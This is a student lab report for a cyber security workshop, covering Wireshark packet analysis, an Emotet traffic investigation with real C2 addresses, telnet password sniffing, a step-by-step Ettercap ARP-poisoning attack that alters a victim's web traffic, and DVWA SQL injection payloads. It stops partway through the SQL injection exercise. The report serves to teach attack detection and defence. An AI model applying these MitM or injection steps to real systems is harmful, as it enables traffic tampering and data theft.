Lloyd Institute of Engineering & Technology

Greater Noida, Uttar Pradesh

Department of Computer Science & Engineering

B. Tech 2nd Year Section A2

Name: Ravi Chaudhary

Roll No: 2201531530023
Subject: Cyber Security Workshop
Code: BCS - 453

Submitted To: Dr. Vandana Kumari Date:15/07/2024

 List of Experiments

S. No. Experiments

Module 1: Packet Analysis using Wire shark

Basic Packet Inspection: Capture network traffic using Wire shark and
1 analyze basic protocols like HTTP, DNS, and SMTP to understand
how data is transmitted and received.
Detecting Suspicious Activity: Analyze network traffic to identify
2 suspicious patterns, such as repeated connection attempts or unusual
communication between hosts.
Traffic Analysis: Analyze captured traffic to identify signs of malware
3 communication, such as command-and-control traffic or data
infiltration.
Password Sniffing: Simulate a scenario where a password is
transmitted in plaintext. Use Wireshark to capture and analyze the
4
packets to demonstrate the vulnerability and the importance of
encryption.
ARP Poisoning Attack: Set up an ARP poisoning attack using tools like
5 Ettercap. Analyze the captured packets to understand how the attack can lead to
a Man-in-the-Middle scenario.
Module 2: Web Application Security using DVWA
SQL Injection: Use DVWA to practice SQL injection attacks.
6 Demonstrate how an attacker can manipulate input fields to extract,
modify, or delete database information.
Cross-Site Scripting (XSS): Exploit XSS vulnerabilities in DVWA to inject malicious
7 scripts into web pages. Show the potential impact of XSS attacks, such as stealing
cookies or defacing websites.
File Inclusion Vulnerabilities: Explore remote and local file inclusion
8 vulnerabilities in DVWA. Show how attackers can include malicious files
on a server and execute arbitrary code.
 Experiment-1
AIM: Basic Packet Inspection: Capture network traffic using Wire shark and
analyze basic protocols like HTTP, DNS, and SMTP to understand how data is
transmitted and received.

Introduction
The first part of the lab introduces packet sniffer, Wireshark. Wireshark is a free open- source
network protocol analyzer. It is used for network troubleshooting and communication protocol
analysis. Wireshark captures network packets in real time and display them in human-readable
format. It provides many advanced features including live capture and offline analysis, three-pane
packet browser, coloring rules for analysis. This document uses Wireshark for the experiments,
and it covers Wireshark installation, packet capturing, and protocol analysis.

Figure 1: Wireshark in Kali Linux

Background

TCP/IP Network Stack

Figure 2: Encapsulation of Data in the TCP/IP Network Stack

TCP/IP is the most commonly used network model for Internet services. Because its most important
protocols, the Transmission Control Protocol (TCP) and the Internet Protocol (IP) were the first
networking protocols defined in this standard, it is named as TCP/IP. However, it contains multiple
layers including application layer, transport layer, network layer, and data link layer.

- Application Layer: The application layer includes the protocols used by most applications
for providing user services. Examples of application layer protocols are Hypertext Transfer
Protocol (HTTP), Secure Shell (SSH), File Transfer Protocol (FTP), and Simple Mail
Transfer Protocol (SMTP).
 - Transport Layer: The transport layer establishes process-to-process connectivity, and it
provides end-to-end services that are independent of underlying user data. To implement
the process-to-process communication, the protocol introduces a concept of port. The
examples of transport layer protocols are Transport Control Protocol (TCP) and User
Datagram Protocol (UDP). The TCP provides flow- control, connection establishment, and
reliable transmission of data, while the UDPis a connectionless transmission model.
- Internet Layer: The Internet layer is responsible for sending packets to across networks. It
has two functions: 1) Host identification by using IP addressing system(IPv4 and IPv6); and
2) Packets routing from source to destination. The examples of Internet layer protocols are
Internet Protocol (IP), Internet Control Message Protocol (ICMP), and Address Resolution
Protocol (ARP).
- Link Layer: The link layer defines the networking methods within the scope of the local
network link. It is used to move the packets between two hosts on the same link. An
common example of link layer protocols is Ethernet.

Getting Wireshark

The Kai Linux has Wireshark installed. You can just launch the Kali Linux VM and open
Wireshark there. Wireshark can also be downloaded from here:
https://www.wireshark.org/download.html
Figure 3: Download Page of Wireshark
Starting Wireshark

When you run the Wireshark program, the Wireshark graphic user interface will be shown as Figure
below. Currently, the program is not capturing the packets.

Figure 4: Initial Graphic User Interface of Wireshark

Then, an interface should be chosen. If you are running the Wireshark on your laptop,you need to
select WiFi interface. If you are at a desktop, you need to select the Ethernet interface being used.
Note that there could be multiple interfaces. In general, you can select any interface but that does
not mean that traffic will flow through that interface. The
network interfaces (i.e., the physical connections) that your computer has to the networkare
shown.
After you select the interface, you can click start to capture the packets as shown in
Figure

Figure 5: Capture Interfaces in Wireshark

Figure 6: Capturing Packets in Wireshark

Figure 7: Wireshark Graphical User Interface on Microsoft Windows
Capturing Packets

After downloading and installing Wireshark, you can launch it and click the name of an interface
under Interface List to start capturing packets on that interface. For example, if you want to capture
traffic on the wireless network, click your wireless interface.

Test Run
Do the following steps:
1. Start up the Wireshark program (select an interface and press start to capture packets).
2. Start up your favorite browser (weasel in Kali Linux).
3. In your browser, go to Wayne State homepage by typing www.wayne.edu.
4. After your browser has displayed the http://www.wayne.edu page, stop Wireshark packet
capture by selecting stop in the Wireshark capture window. This will cause the Wireshark
capture window to disappear and the main Wireshark window to display all packets
captured since you began packet capture see image below:
5. Color Coding: You’ll probably see packets highlighted in green, blue, and black. Wireshark
uses colors to help you identify the types of traffic at a glance. By default, green is TCP
traffic, dark blue is DNS traffic, light blue is UDP traffic, and black identifies TCP packets
with problems — for example, they could have been delivered out-of-order.
6. You now have live packet data that contains all protocol messages exchanged between your
computer and other network entities! However, as you will notice the HTTP messages are
not clearly shown because there are many other packets included in the packet capture.
Even though the only action you took was to open your browser, there are many other
programs in your computer that communicate via the network in the background. To filter
the connections to the ones we want to focus on, we have to use the filtering functionality
of Wireshark by typing “http” in the filtering field as shown below:

7. Now, we can try another protocol. Let’s use Domain Name System (DNS) protocol as an
example here.
8. Let’s try now to find out what are those packets contain by following one of the
conversations (also called network flows), select one of the packets and press the right
mouse button (if you are on a Mac use the command button and click), you should see
something similar to the screen below:
 Experiment-2

AIM: Detecting Suspicious Activity: Analyze network traffic to identify suspicious patterns, such as
repeated connection attempts or unusual communication between hosts.

Task 1 Introduction-
Note: A VM is attached to this room. You don’t need SSH or RDP; the room provides a “Split View” feature.
DO NOT directly interact with any domains and IP addresses in this room. The domains and IP addresses are
included only for reference reasons.

Task 2 Nmap Scans –

Nmap Scans
Nmap is an industry-standard tool for mapping networks, identifying live hosts and discovering the services. As it
is one of the most used network scanner tools, a security analyst should identify the network patterns created with
it. This section will cover identifying the most common Nmap scan types.
· TCP connect scans
· SYN scans
· UDP scans
It is essential to know how Nmap scans work to spot scan activity on the network. However, it is impossible to
understand the scan details without using the correct filters. Below are the base filters to probe Nmap scan
behaviour on the network.

TCP flags in a nutshell.

TCP Connect Scans
TCP Connect Scan in a nutshell:
· Relies on the three-way handshake (needs to finish the handshake process).
· Usually conducted with nmap -sT command.
· Used by non-privileged users (only option for a non-root user).
· Usually has a windows size larger than 1024 bytes as the request expects some data due to the nature of the
protocol.

The images below show the three-way handshake process of the open and close TCP ports. Images and pcap
samples are split to make the investigation easier and understand each case’s details.

Open TCP port (Connect):

The above images provide the patterns in isolated traffic. However, it is not always easy to spot the given patterns
in big capture files. Therefore analysts need to use a generic filter to view the initial anomaly patterns, and then it
will be easier to focus on a specific traffic point. The given filter shows the TCP Connect scan patterns in a
capture file.
SYN Scans
TCP SYN Scan in a nutshell:
· Doesn’t rely on the three-way handshake (no need to finish the handshake process).
· Usually conducted with nmap -sS command.
· Used by privileged users.
· Usually have a size less than or equal to 1024 bytes as the request is not finished and it doesn’t expect to receive
data.

The given filter shows the TCP SYN scan patterns in a capture file.

UDP Scans
UDP Scan in a nutshell:
· Doesn’t require a handshake process
· No prompt for open ports
· ICMP error message for close ports
· Usually conducted with nmap -sU command.
The above image shows that the closed port returns an ICMP error packet. No further information is provided
about the error at first glance, so how can an analyst decide where this error message belongs? The ICMP error
message uses the original request as encapsulated data to show the source/reason of the packet. Once you expand
the ICMP section in the packet details pane, you will see the encapsulated data and the original request, as shown
in the below image.
The given filter shows the UDP scan patterns in a capture file.

Task 3 Identifying Hosts: DHCP, NetBIOS and Kerberos –

Identifying Hosts
When investigating a compromise or malware infection activity, a security analyst should know how to identify
the hosts on the network apart from IP to MAC address match. One of the best methods is identifying the hosts
and users on the network to decide the investigation’s starting point and list the hosts and users associated with
the malicious traffic/activity.
Usually, enterprise networks use a predefined pattern to name users and hosts. While this makes knowing and
following the inventory easier, it has good and bad sides. The good side is that it will be easy to identify a user or
host by looking at the name. The bad side is that it will be easy to clone that pattern and live in the enterprise
network for adversaries. There are multiple solutions to avoid these kinds of activities, but for a security analyst,
it is still essential to have host and user identification skills.
Protocols that can be used in Host and User identification:
· Dynamic Host Configuration Protocol (DHCP) traffic
· NetBIOS (NBNS) traffic
· Kerberos traffic
DHCP Analysis
DHCP protocol, or Dynamic Host Configuration Protocol (DHCP), is the technology responsible for managing
automatic IP address and required communication parameters assignment.
DHCP investigation in a nutshell:
NetBIOS (NBNS) Analysis
NetBIOS or Network Basic Input/output System is the technology responsible for allowing applications on
different hosts to communicate with each other.
NBNS investigation in a nutshell:
Kerberos Analysis
Kerberos is the default authentication service for Microsoft Windows domains. It is responsible for authenticating
service requests between two or more computers over the untrusted network. The ultimate aim is to prove identity
securely.
Kerberos investigation in a nutshell:

Task 4 Tunneling Traffic: DNS and ICMP –

Tunnelling Traffic: ICMP and DNS

Traffic tunnelling is (also known as “port forwarding”) transferring the data/resources in a secure method to
network segments and zones. It can be used for “internet to private networks” and “private networks to internet”
flow/direction. There is an encapsulation process to hide the data, so the transferred data appear natural for the
case, but it contains private data packets and transfers them to the final destination securely.
Tunnelling provides anonymity and traffic security. Therefore it is highly used by enterprise networks. However,
as it gives a significant level of data encryption, attackers use tunnelling to bypass security perimeters using the
standard and trusted protocols used in everyday traffic like ICMP and DNS. Therefore, for a security analyst, it is
crucial to have the ability to spot ICMP and DNS anomalies.

ICMP Analysis
Internet Control Message Protocol (ICMP) is designed for diagnosing and reporting network communication
issues. It is highly used in error reporting and testing. As it is a trusted network layer protocol, sometimes it is
used for denial of service (DoS) attacks; also, adversaries use it in data exfiltration and C2 tunnelling activities.
ICMP analysis in a nutshell:
Usually, ICMP tunnelling attacks are anomalies appearing/starting after a malware execution or vulnerability
exploitation. As the ICMP packets can transfer an additional data payload, adversaries use this section to
exfiltrate data and establish a C2 connection. It could be a TCP, HTTP or SSH data. As the ICMP protocols
provide a great opportunity to carry extra data, it also has disadvantages. Most enterprise networks block custom
packets or require administrator privileges to create custom ICMP packets.
A large volume of ICMP traffic or anomalous packet sizes are indicators of ICMP tunnelling. Still, the
adversaries could create custom packets that match the regular ICMP packet size (64 bytes), so it is still
cumbersome to detect these tunnelling activities. However, a security analyst should know the normal and the
abnormal to spot the possible anomaly and escalate it for further analysis.
DNS Analysis
Domain Name System (DNS) is designed to translate/convert IP domain addresses to IP addresses. It is also
known as a phonebook of the internet. As it is the essential part of web services, it is commonly used and trusted,
and therefore often ignored. Due to that, adversaries use it in data exfiltration and C2 activities.
DNS analysis in a nutshell:
Similar to ICMP tunnels, DNS attacks are anomalies appearing/starting after a malware execution or vulnerability
exploitation. Adversary creates (or already has) a domain address and configures it as a C2 channel. The malware
or the commands executed after exploitation sends DNS queries to the C2 server. However, these queries are
longer than default DNS queries and crafted for subdomain addresses. Unfortunately, these subdomain addresses
are not actual addresses; they are encoded commands as shown below:
“Encoded-commands.maliciousdomain.com”
When this query is routed to the C2 server, the server sends the actual malicious commands to the host. As the
DNS queries are a natural part of the networking activity, these packets have the chance of not being detected by
network perimeters. A security analyst should know how to investigate the DNS packet lengths and target
addresses to spot these anomalies.
 EXPERIMENT- 3

AIM: Malware Traffic Analysis: Analyze captured traffic to identify signs of malware
communication, such as command-and-control traffic or data infiltration.

One of the most effective tools for malware infection has been the Emotet malware; A malware that can itself
collect and transmit data about the systems it infects while actively introducing other malware, such as ransomware,

onto the system. The Emotet malware has been traditionally difficult to detect in systems and in its current form

has been made available to malicious actors as a “Malware-as-a-Service” that can be customized with various

malicious payloads.

Wireshark has two levels of filters: one that is applied at the initial ‘capture’ level, so that only the broader types of

traffic that you are interested in are syphoned from all of the network traffic, and the other that is applied at the

‘display’ level to help isolate data of interest (Porup, 2018). One additional feature of Wireshark is that it also

allows users to configure special ‘coloring rules’ that can highlight captured packets that contain specific signatures

of possible malware that makes it easy to quickly identify potential threats.

Wireshark Capture Filters Dialog

 Wireshark Display Filters Dialog

Once traffic has been captured and, if necessary, effectively filtered, it can be exported and saved in a .pcap file

that can be stored and analyzed at a later time. Especially useful in this project was Wireshark’s ability to export

the captured data from an infected system as a TCP dump to the .pcap file, which we were then able to acquire
and analyze, without risk of infecting our own systems for the sake of investigation (Duncan, 2021).

Exporting Selected Packet Data from Wireshark Capture

 Wireshark Capture Export Format Options

All in all, Wireshark is a ‘Swiss Army Knife’ type toolkit that enables powerful, critical analysis of network

activity for many different applications.

Emotet: A Trojan Conduit to Ransomware

As a contraction of the words “malicious” and “software”, the word malware is an umbrella term that covers a

vast number of unique variations. One of those variations is ransomware, a type of malware that is characterized

by its holding the victim’s data for ransom. In many instances, after infection, the malware will encrypt the

victim’s files and then demand a ransom payment in exchange for restoring access to the data (Fruhlinger, 2020).
In terms of attack vectors, ransomware can infect a system in a number of different ways, common among them

is phishing spam and, according to Kaspersky, this is the most frequent way that Emotet infects computer

systems. Emotet is often spread through spam emails that contain either a malicious URL or an infected

document and after the victim either downloads the infected file or accesses the URL, more malware is then

downloaded onto the system (Kaspersky, n.d.).

Emotet then gathered the infected system’s data (such as host name, all running processes and more) and
compressed it using the Deflate algorithm. The malware then “encrypts the compressed data … with a session key,

and packs the session key (AES), that is encrypted using an RSA public key, along with a hash value and the

encrypted data” (Lu, 2019). This encrypted data makes up the HTTP body data of POST requests sent to the C2

servers.

Example of Emotet-Encrypted Data Source: A Deep Dive into the Emotet Malware (Lu, 2019)

Emotet infections have remained especially challenging to detect and prevent in their earliest stages.

Traffic Analysis: Methods & Filters

Because Emotet spreads and further infects over HTTP, we can analyze the data sent over a network to identify and

track the behavior of the Emotet virus. We managed to obtain a series of .pcap files that contain the network packet
data of a system that has been infected by the Emotet virus, and will be analyzing it using Wireshark to further

understand its behavior (Duncan, 2021). Keep in mind that these network activities contain Windows-based
malware, and you should be incredibly careful if following along on a Windows system.
 Wireshark pcap File Containing Evidence of the Emotet Infection

HTTP & TLS Traffic

Through Wireshark we have a very detailed history of network activity involving this infected system, but a good
deal of it is not very valuable to us. What we need to do now is filter out all the activity that we do not need so that

we can find and isolate the data we are interested in more easily. A significant amount of data can be found in each

of these pcap files, and each one only holds a few minutes of traffic on systems that were mostly stationary.

Suspicious traffic can be easily camouflaged amongst regular traffic, so it is important that we can search for and

identify unwanted or dangerous behavior.

Since we know Emotet maneuvers through the web, we can apply a filter that will give us HTTP requests and TLS

handshakes only. From there we may be able to determine where the infection might have come from.

Wireshark Filtering Captured Traffic to Display Only HTTP or TLS Handshake Packets

Now we can see a few web requests have been made that may have been used to retrieve the ransomware (although

one of the URLs redirected to a suspended page) that still leaves 3–4 possible sources. We can edit the previously

used filter to view the responses of these requests.

 Wireshark Filtering to Display Only Responses to the Above Requests

Now we can see the responses that the infected system received from the web requests. The one that should stand
out is the last request, seo.udaipurkart.com, as there is no response. We can use Wireshark to follow the TCP

stream in order to discover more about it. By right-clicking the request and clicking follow TCP Stream, or by

pressing Ctrl+Alt+Shift+T we can see the full exchange.

Extracting the DLL

Examining the HTTP Response Containing the DLL Download

Here we can see that seo.udaipurkart.com responded with a .dll file download. This is the file responsible for

putting the Emotet malware on the system in the first place. Now that we have the transfer, we can extract

the .dll file from the .pcap file for future analysis, by going to file export objects HTTP and saving the file

named Sgms.

Exporting the Malicious DLL file from the Wireshark Capture

Now that we know where the malware came from, we should further determine what it is doing. Since this

version of Emotet uses HTTP POST requests to command and control the system, we can filter traffic with

the following filter to show us all these requests.

 Wireshark Filtering for all HTTP POST Requests

We can see there are a number of post requests being sent to the same IP addresses, 5.2.136.90:80 and

167.71.4.0:8080. Further analysis will later determine the first address to be an Emotet Botnet server that is

communicating with this infected system. But the second address stands out as some of the post requests are

URL encoded. Use the following command view all the URL encoded posts.

Alternatively, you can use the following command to view the post requests coming from the non URL

encoded transfers.

Failed Connection Requests

Failed connection requests may also show in the .pcap file. In some cases, an infected host may try to

connect with a server that has been taken off-line or is refusing a TCP connection. If that is the case, you can
still analyze the requests being made to discover the destination. We used the following filter to find failed

connection attempts.

Analyzing Failed Connection Requests from Wireshark Capture

SMTP Traffic

As Emotet also works as a spambot, we can take a look at the system’s mailing traffic to learn even more. Use
this filter to get a look at traffic using simple mail transfer protocol.

Filtering Wireshark Capture to Examine SMTP Traffic

Most (if not all) of the data will be encrypted. If you are lucky enough, you might be able to find some

unencrypted data. The following filter will give you results of unencrypted SMTP transfers that you can analyze.

Filtering Wireshark Capture for Any Unencrypted SMTP Transfers

Other filters can be used to analyze traffic that is commonly used by Emotet infections. For example, variations
of Emotet that use Trickbot can be identified by searching traffic over Trickbots commonly used ports: 447 and

449. Additionally, Trickbot is also known to take binaries through .png image files. Either of these filters will be

able to identify Trickbot behaviour in an Emotet infected system.

Examining the Initial HTTP GET Request for the Emotet DLL

Connection to the C2 Server

The IP of the web server hosting the DLL is 103.92.235.25 which resolves to server27.hostingraja.org, an
Indian hosting service. The hostname of the site that the DLL is served on is seo.udaipurkart.com which looks
like a compromised online shopping platform.

Tracing the Web Server Hosting the Malicious DLL

The machine which receives the DLL and becomes infected with Emotet has the IP 10.1.6.206 and it communicates

with two C2 servers. One of the C2 servers is 5.2.136.90 and the other is 167.71.4.0. The infected machine

communicates with the C2 servers through POST requests with the commands sent through encrypted files.

Wireshark-Captured HTTP POST Communications with the C2 Server

 Examining HTTP POST Request with the C2 Server

We saw how after the initial execution of the Emotet binary, HTTP GET and POST requests are made to and
from a remote C2 server that contain both critical data about the infected host machine as well as various

malicious payloads to further infect it. Using the example of infection above, we saw that some methods of

detection could easily flag an Emotet infection but would also likely trigger false-positive Emotet identifications

by legitimate HTTP traffic as well. To avoid this, the most promising method of early prevention of the Emotet

infection in the first place, would be to block unsigned DLLs from being downloaded or run.
 EXPERIMENT- 4

AIM: Password Sniffing: Simulate a scenario where a password is transmitted in plaintext.

Use Wireshark to capture and analyze the packets to demonstrate the vulnerability and the
importance of encryption.

- Set the network adapter to "NAT: Used to share the host's IP address." This setting allows the Ubuntu Server
to share the host's IP address and be accessible from the host machine.

Step 5: Power On the Ubuntu Server and Obtain the IP Address

- After creating the Ubuntu Server virtual machine, power it on within VMware Workstation Pro.

Once it's booted up, open a terminal within the Ubuntu Server virtual machine.
 Now launch your Wireshark, and you'll be prompted to select a network interface to capture traffic.

- Select “VMware Network Adapter VMnet8”

After selecting the network interface, it should look like this.

Download Putty and Initiate Telnet Connection

Putty is a free and open-source SSH and Telnet client for Windows and Unix platforms and we will be using it to
connect to our Ubuntu server.

Open Putty on your host machine. In the "Host Name (or IP address)" field, enter the IP address of the Ubuntu
Server virtual machine obtained in Step 5.

- Set the connection type to "Telnet" by selecting the appropriate radio button.

Once connected, you'll be prompted to enter your username and password.

Enter your credentials as you normally would during a SSH login.

 Monitor Wireshark for Telnet Traffic

As you log in to the Ubuntu Server via Telnet using Putty, Wireshark will capture the network traffic passing
through the selected interface.

- Go to Wireshark and click on the "Stop" red button to halt the packet capture process.

analyze Telnet Packets with Wireshark

To further analyze Telnet traffic in Wireshark, apply a display filter to focus only on Telnet packets:

- Go to the filter box and enter "Telnet" as the filter criterion.

- Click "Apply" to filter for only Telnet traffic.

- Navigate to the "Analyze" tab in Wireshark.

- Select "Follow" and then click "TCP Stream."

This action will display a comprehensive view of the Telnet session you were sniffing, including the username
and password transmitted in plain text.

This analysis demonstrates how hackers can intercept sensitive credentials via Telnet sessions, emphasizing the
critical importance of encryption and secure protocols in network communication.

Conclusion

Following these steps, users can effectively capture and analyze Telnet traffic using Wireshark within a virtualized
environment created with VMware Workstation Pro.
 EXPERIMENT- 5

AIM: ARP Poisoning Attack: Set up an ARP poisoning attack using tools like Ettercap.
Analyze the captured packets to understand how the attack can lead to a Man-in-the-Middle
scenario.
Step #1: Start ettercap
Let's view the help file for ettercap by typing;
kali > ettercap -h

As you can see, ettercap has a significant help file for running it from a command line, but the only thing we need
from here is the switch to run it in graphical mode. In the bottom line of the screenshot (not the bottom line of the
actual help file as I have truncated it in the interest of space), you can see the -G switch. This after the command
ettercap will launch the ettercap GUI.
kali > ettercap -G
When we do, the ettercap GUI will start as seen below.
The first step in launching our MiTM attach is to start sniffing. Go to pulldown menu that says "Sniff" and click on
"Unified Sniffing"

When we do that, it opens a new window asking us what interface we want to use and defaults to eth0.
When we click "OK", ettercap launches it sniffing and loads its plugins.

Our next step to find the hosts on the network. Click on the "Hosts" tab and you will see a menu that includes "Scan
for Hosts". Click on it and ettercap will begin scanning the network for hosts.
Now, using that same "Hosts" tab, click on "Hosts List". This will display all the hosts that ettercap has discovered on
your network as seen in the screenshot below.

Now, select one of the hosts that will be the target of this attack in the window by clicking on it and then click on "Add
to Target 1" at the bottom of the window. When you do so, ettercap will add that host as the first target in our MiTM
attack as seen in the screenshot below.
Next, select the second host in this attack and then click "Add to Target 2".
Finally, go to the menu above and click on MITM tab and the drop down menu will have a selection called "ARP
Poisoning" as seen in the screenshot below.

Select it and it will open a pop window like below. Select "Sniff remote connections".
When we press OK, ettercap will begin ARP poisoning and you will see ettercap respond in its main windows with
the message below.
Now, we have successfully placed ourselves between the two targets systems and all their traffic must flow through
us. This is where the fun begins as we can now delete, manipulate, impersonate and view all their traffic.
Altering the Traffic
As I mentioned above, the real risk in a MiTM attack is that the attacker can eavesdrop on the Internet traffic as well
as alter it, if they want. In this section, now that we are between the two systems we will demonstrate the risks of
MiTM attack. We will use the MiTM attack to edit/alter the Internet traffic as seen by the target. In this way, the
attacker can actually alter the content of websites, alter the content of an email, change the pictures seen by the target
in their Internet traffic, delete specific Internet traffic packets, etc. The message should be clear, when we have placed
ourselves in the middle, the target is at our mercy!
Step #2: Alter the Traffic
In this next section, we will be altering the traffic from an internal corporate Intranet site. This site is used by all the
employees for corporate announcements, scheduling, etc. Although this scenario is within a corporate Intranet within
a LAN, the technique and effect would be the same over the wider Internet. In our scenario, the manager has posted a
new starting time for the following day because of a very heavy work load. As a result, he wants everyone to begin
work at 6 am and he posts this to the corporate intranet site for all the employees to see. Our attacker has malicious
intentions toward the target and wants to alter the message to the target so that they instead come to work late, at 11
am. This is likely to have negative repercussions for the target from the manager, exactly what the attacker wants.
Step #3, Create the Intranet Site
The corporate Intranet announcement page looks like the screenshot below. Everyone in the department will see it and
although they are disappointed in the earlier start time, they adjust their schedule to help with the additional workload.
Our attacker doesn't want the target to see this message, but rather an altered message to mislead him as to the new
starting time.

Step #4: Using Ettercap Filters

One of the many beauties of using Ettercap for MiTM attacks is the ease with which you can alter and edit the target's
Internet traffic.
From the Ettercap GUI, you will see above the top menu bar a pull down menu item labeled "Filters". Click on it and
then Click on "Load a Filter".
When you do so, a window like that below will appear. We can see to the right of the window, numerous filter files.

Let's take look at the contents of that directory (/usr/share/ettercap) from a terminal in Kali. Open a terminal and type;
kali > cd /usr/share/ettercap
kali > ls -l
As you can see in the screenshot above, there are numerous Ettercap filter files. Note the one named
etter.filter.examples. Let's open it with Leafpad and see what it contains.
kali > leafpad etter.filter.examples
This file contains numerous Ettercap filter examples of various types. We can use these as templates for creating our
own filters. Notice the various types;
• display a message on port 22
• log all telnet traffic
• log all traffic except http
• do some operation on the payload of the packet (in this case change numeric values)
• drop any packet containing a particular word or string
• log SSH decrypted packets matching a regular expression
• and many more
In our case, we want to replace words from a website with other words to alter the meaning of the message. That is,
we want to replace "Heavy" with "Light" and "6" with "11" so that the message read by the target would be changed
to:
Due to the Light Workload, Everyone is Expected to Come to Work at 11am
Ettercap has a pre-built filter file for doing precisely that! It's the etter.filter file. Let's open it with Leafpad and take a
look around.
kali > leafpad etter.filter

Notice, starting with Line 21 after the comments, we have some simple code that searches for TCP traffic (if (ip.proto
== TCP)) and it contains data that matches the word "ethercap" (search (DATA.data, "ethercap")) then log and replace
it with ettercap (replace("etthercap", "ettercap") ) and create message of what happened (msg("Correctly substituted
and logged. \n")) We can use this same code, but replace the words it is looking for and replacing it with the words we
want to replace, namely "Heavy" and "6".
Next, we have to edit this Ettercap filter file. First, copy and paste all the uncommented code so that you now have
two stanzas. Then replace the word "ethercap" with "Heavy" in the first stanza and in the second stanza, replace the
word "ethercap" with "6" as seen the screenshot below.
Make all the changes circled in the screenshot above and save the file.
Step #5: Compile the Filter
Now, before can use the filter, we must compile it. Open a terminal and type;
kali >etterfilter etter.filter -o etter.filter.heavy
Where:
etterfilter is the command to compile the filter file
etter.filter is the input file
-o etter.filter.heavy directs the compiled output to a new file
Step #6: Add the Filter to Ettercap
Now that filter file has been recompiled and ready to use, we can go back to the Ettercap GUI and select "Filters" and
now, click on our compiled new filter that we created. When it appears in the "Selection" window, go ahead and click
OK. This should now activate an automatic process whereby, in real time, whenever the word " Heavy" is seen in the
Internet traffic it, is replaced with "Light" and whenever the number "6" appears, it replaces it with "11". It's important
to note that this replacement with take place on ALL internet traffic coming to the target.
Now, when the target goes to the Intranet site announcing the new starting time, they will see the following web page
as seen below. Everyone else will see the actual Intranet site, but the target will have those two words changed.

This tutorial demonstrates how easy a MitM attack is using ettercap and the power of being able to alter the traffic to
the target system seamlessly and transparently. The end-user has no indication that their traffic has been altered!
 EXPERIMENT- 6

AIM: SQL Injection: Use DVWA to practice SQL injection attacks. Demonstrate how an
attacker can manipulate input fields to extract, modify, or delete database information.

Lab Diagram

Connecting to your lab

In this module, you will be working on the following equipment to carry out the steps defined in each
exercise.

PLABSA01 (Windows Server 2012 R2 - Domain Controller) PLABWIN10

(Windows 10 - Domain Member) PLABKALI01
(Kali 2016.2)

To start, simply choose a device and click Power on. In some cases, the devices maypower on
automatically.
Exercise 1 - DVWA Usage

Damn Vulnerable Web App works using PHP/MySQL web applications that have been engineered to be
deliberately vulnerable to a great variety of attack vectors for the purpose of allowing security professionals to test
their skills and tools in a legal environment. It’s a very useful tool when learning and applying the techniques to
security testing applications when using an SDLC.

In this exercise we will:

Activate DVWA Connect to

DVWA

Task 1 - Activate DVWA

In this task, we will be starting the DVWA web service through XAMPP so that the website is
broadcasting through the IP of the Windows 2012 server on the IP of 192.168.0.1. We will then start up
Kali and connect to the device.

Step 1

Connect to PLABSA01, on the taskbar you will see the XAMPP icon, click this icon and activate the application.
 Figure 6.1 Screenshot of PLABSA01: XAMPP running.

This starts up the DVWA website which is has been configured to broadcast on thePLABSA01 IP
address.

Step 2

Now open up Internet Explorer and type into the address bar:

192.168.0.1

Press Enter.

This will take you to the website being broadcast by XAMPP; this is to confirm that the site is up and working.
 Type into the address bar.

http://192.168.0.1/dvwa/login.php

Figure 6.2 Screenshot of PLABSA01: DVWA site running.

This should present you with the login page for DVWA. Therefore we know the site is upand working.

We can now close internet explorer.

Step 3

Ensure you have powered on all the devices listed in the introduction and connect to
PLABKALI01.
In the Username filed type the following:

root

Click Next.

Figure 6.3 Screenshot of PLABKALI01: Logging in to PLABKALI01 as root user.

Step 4

In the Password field type the following:

Passw0rd

Click Sign In.

 Figure 6.4 Screenshot of PLABKALI01: Logging into PLABKALI01 as root user.

Step 5

You have successfully logged in to PLABKALI01.

 Figure 6.5 Screenshot of PLABKALI01: Displaying successfully logged in toPLABKALI01.

Task 2 - Connecting to DVWA

We will now connect to the DVWA service and confirm the website contents is working through Firefox within
Kali.

Step 1

Open Firefox ESR application and type into the address bar the following:

192.168.0.1/dvwa/login.php
 Figure 6.6Screenshot of PLABKALI01: DVWA accessed from Firefox.

Again, the site is confirmed to be up and working, but we will go a little further to make sure of this now.

Step 2

Let’s now log into the site and begin working with it.Type in the

following credentials and click Login. Username:

Admin
Password:

password

If Firefox ESR presents this reminder for password information, you can click
Remember.

Figure 6.7 Screenshot of PLABKALI01: Logging into DVWA.

 Figure 6.8 Screenshot of PLABKALI01: DVWA main menu.

If you now scroll to the bottom of this page, you will see the following details.

Your username:

admin

Security Level:

low

PHPIDS:

disabled
 Figure 6.9 Screenshot of PLABKALI01: DVWA main menu bottom.

The PHPIDS has been turned off for these exercises; that is why its listed as disabled.

Step 3

Scroll to the top of the page and Click in the left column Setup/Reset DB.
 Figure 6.10 Screenshot of PLABKALI01: In the DVWA menu setting up a newDatabase.

Step 4

Scroll down on the page and Click on the Create/ Reset Database button.
 Figure 6.11 Screenshot of PLABKALI01: DVWA creating the DVWA database.

You will see an output telling you the database has been created, with users, some data, aguestbook with data and
the setup was successful. We are now ready to start a SQL injection.
 Figure 6.12 Screenshot of PLABKALI01: Displaying the new database has been successfully
created.

Stay logged into PLABKALI01 and move onto the next exercise.

Exercise 2 - Performing an SQL Injection Attack

SQL injections are used to inject code into applications which then pull out data which typically shouldn’t be
displayed. For example, the technic can be used to find personal information of people which might be hidden
from normal view presenting details like username and passwords.

In this exercise, we will cover:

DVWA SQL Injection

Task 1 - DVWA SQL Injection Page

We are now going to perform a manual SQL Injection attack on the DVWA page to obtain information about the
database and the information that it contains regarding the column headings, to work out where the user
information is sitting.

Step 1

Click on the Tab for SQL Injection.

Figure 6.11 Screenshot of PLABKALI01: DVWA SQL Injection.

Now we will enter some details.

Step 2

We are presented with a field to enter a User ID.Let’s try this

out with basic credentials.

Type in the following and click Submit.

User ID: 2

Figure 6.12 Screenshot of PLABKALI01: DVWA SQL Injection ID results.

You will be given a readout of First

name: Gordon
Surname: Brown

Step 3

Switch back to the Firefox page and let’s begin.Type into

the User ID Field click Submit:

Figure 6.13 Screenshot of

PLABKALI01: DVWA SQL Injection ID results.

We see results of:ID:3

First Name: Hack

Surname: Me

We will move onto more advanced SQL terms now to work out the columns.

Type into the User ID Field and click Submit:

3’

Figure 6.14 Screenshot of PLABKALI01: DVWA error screen.

We get this error message which is a positive sign and strongly indicates this website isvulnerable to SQL
Injection.

Step 4

Type into the User ID Field and click Submit:

 3’ and 1=1 #

Figure 6.15 Screenshot of PLABKALI01: DVWA SQL Injection results.

Type into the User ID Field:

3’ and 1=0 union select null, version() #

 Figure 6.16 Screenshot of PLABKALI01: DVWA SQL Injection results.

